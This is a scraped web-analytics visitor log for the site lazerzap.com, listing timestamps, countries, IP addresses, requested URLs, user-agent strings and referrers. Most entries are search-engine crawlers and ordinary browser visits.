Mar 30 - 01:34 121.215.40.185 http://lazerzap.com/total.php lazerzap.com 96.30.11.144 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Internet Explorer 8 http://lazerzap.com/cgi-bin/wiki.pl?action=admin;id=Categories Jul 05 - 06:27 Australia 14.201.195.86 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 06:39 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 05 - 07:02 Ukraine 79.110.17.2 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47 (Edition Yx) http://lazerzap.com/ Jul 05 - 07:13 United States 157.55.39.180 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 05 - 07:14 Germany 178.162.216.7 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.1144 http://med.ultramed.kiev.ua/out.php?link=http://vk-vents.com.ua/vozdukhovody-i-montazhnye-elementy/plastikovye-vozdukhovody/pryamougolnye-plastikovye-kanaly-plastivent/soedinitel-kruglykh-i-ploskikh-kanalov.html Jul 05 - 07:21 United States 157.55.39.180 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 05 - 07:23 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 05 - 07:59 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 09:34 Australia 14.201.195.86 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 No Referrer Jul 06 - 09:37 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 10:11 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 10:45 United States 54.36.148.42 http://lazerzap.com/index.php/component/users/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 06 - 11:21 China 14.215.176.12 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=orangelbb Jul 06 - 11:28 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 11:45 China 14.215.176.134 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=drivermky Jul 06 - 11:58 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 12:01 China 106.120.160.114 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Internet Explorer 8 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) http://lazerzap.com/ Jul 06 - 12:09 United States 54.36.149.4 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 06 - 12:11 Canada 192.95.29.116 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30 No Referrer Jul 06 - 12:11 Canada 192.95.29.116 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30 No Referrer Jul 06 - 12:15 United Kingdom 178.79.147.224 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 No Referrer Jul 06 - 13:15 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 13:30 United States 69.58.178.58 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; ips-agent) No Referrer Jul 06 - 13:52 China 182.61.16.82 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown python-requests/2.19.1 No Referrer Jul 06 - 13:55 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 14:25 United States 107.6.169.252 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 No Referrer Jul 06 - 14:52 Russian Federation 46.161.9.23 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Firefox Mozilla/5.0 (Windows NT 5.0; rv:30.1) Gecko/20100101 Firefox/30.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 06 - 14:52 Russian Federation 46.161.9.23 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Firefox Mozilla/5.0 (Windows NT 5.0; rv:30.1) Gecko/20100101 Firefox/30.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 06 - 14:52 Russian Federation 46.161.9.23 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Firefox Mozilla/5.0 (Windows NT 5.0; rv:30.1) Gecko/20100101 Firefox/30.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 06 - 14:52 Russian Federation 46.161.9.23 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Firefox Mozilla/5.0 (Windows NT 5.0; rv:30.1) Gecko/20100101 Firefox/30.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 06 - 14:52 Russian Federation 46.161.9.23 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Firefox Mozilla/5.0 (Windows NT 5.0; rv:30.1) Gecko/20100101 Firefox/30.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 06 - 14:52 Russian Federation 46.161.9.23 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Firefox Mozilla/5.0 (Windows NT 5.0; rv:30.1) Gecko/20100101 Firefox/30.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 06 - 15:06 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 15:37 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 15:56 China 183.198.235.228 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/B8A7 http://lazerzap.com Jul 06 - 16:28 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 16:29 Russian Federation 146.185.241.40 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 8.1; WOW64; rv:32.1) Gecko/20100101 Firefox/32.1 http://lazerzap.com/ Jul 06 - 16:35 United States 138.197.147.163 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 No Referrer Jul 06 - 16:44 United States 54.36.148.63 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 06 - 16:48 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 17:36 China 180.76.15.155 http://www.lazerzap.com/index.php/component/users/ts_files/ts_files/scroll.js www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 06 - 17:40 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 17:42 United States 206.180.165.147 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 No Referrer Jul 06 - 18:00 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 18:04 China 106.11.153.186 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown YisouSpider No Referrer Jul 06 - 18:28 Russian Federation 46.161.9.3 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3223.8 Safari/537.36 http://lazerzap.com/ Jul 06 - 18:52 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 19:03 United States 66.160.140.182 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown The Knowledge AI No Referrer Jul 06 - 19:12 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 19:52 Ukraine 178.159.37.11 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 No Referrer Jul 06 - 19:58 Australia 14.200.13.172 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 No Referrer Jul 06 - 20:44 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 20:49 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 21:11 United States 157.55.39.180 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 06 - 21:22 United States 54.36.149.48 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 06 - 21:28 Poland 91.236.74.10 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; Win64; rv:32.1) Gecko/20100101 Firefox/32.1 http://lazerzap.com/ Jul 06 - 22:06 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 22:11 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 22:26 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 22:41 United States 52.53.201.78 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 No Referrer Jul 06 - 23:13 United States 66.249.66.78 http://lazerzap.com/index.php/+/ts_files/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 23:15 Japan 133.130.48.124 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 No Referrer Jul 06 - 23:17 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 23:25 Japan 133.130.48.124 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 No Referrer Jul 06 - 23:43 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 02:07 United States 54.36.148.200 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 06 - 02:49 China 123.207.95.146 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Internet Explorer 6 Mozilla/4.0 (compatible; MSIE 6.1; Windows NT) No Referrer Jul 06 - 03:33 Russian Federation 5.255.250.160 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 06 - 03:33 United States 100.43.91.114 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 06 - 04:15 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 05:20 Russian Federation 46.161.9.56 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 http://lazerzap.com/cgi-bin/wiki.pl?action=like;id=BBS Jul 06 - 05:36 185.25.34.137 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 No Referrer Jul 06 - 05:52 United States 216.244.66.241 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; 